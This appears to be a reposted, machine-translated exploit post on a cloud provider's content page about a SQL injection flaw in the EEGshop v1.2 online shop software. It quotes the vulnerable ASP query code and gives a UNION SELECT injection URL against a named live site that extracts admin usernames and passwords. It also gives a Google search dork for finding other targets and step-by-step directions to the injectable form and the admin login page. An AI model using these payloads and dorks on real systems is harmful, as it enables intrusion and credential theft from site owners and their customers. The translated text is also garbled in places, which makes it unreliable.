Tesco Online Shopping System EEGshop v1.2SQL Injection Vulnerability

Source: Internet
Author: User

ShiDao Network

Tesco Online Shopping System EEGshop v1.2SQL Injection Vulnerability
In the user/shhr_inc.asp file, check the code here:
If request. QueryString ("action") = "edit" then
Id = request. QueryString ("id ")
If id = "" then response. End
Set rs = server. CreateObject ("adodb. recordset ")
Rs. open "select * from EEG_Consignee where username =" & checkFFSQLStr (request. cookies ("eeg_username") ("username") & "and id =" & id, conn, 1, 1
Only the username is checked, and the id is ignored.
Injection statement: http://www.hfsydg.com/User/shhr_inc.asp? Action = edit & id = 24% 20and % 201 = 2% 20 union % 20 select % ,,2, username, password, 9% 6, 20 from % 20eeg_admin % 20 where % 20id = 1

Google: inurl: eList. Asp? Act steps: register a user → [Continue to fill in details] → recipient → add receiver → Add a receiver → modify → you can see the id information in the address bar and inject it. Background: admin/Login. Asp

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.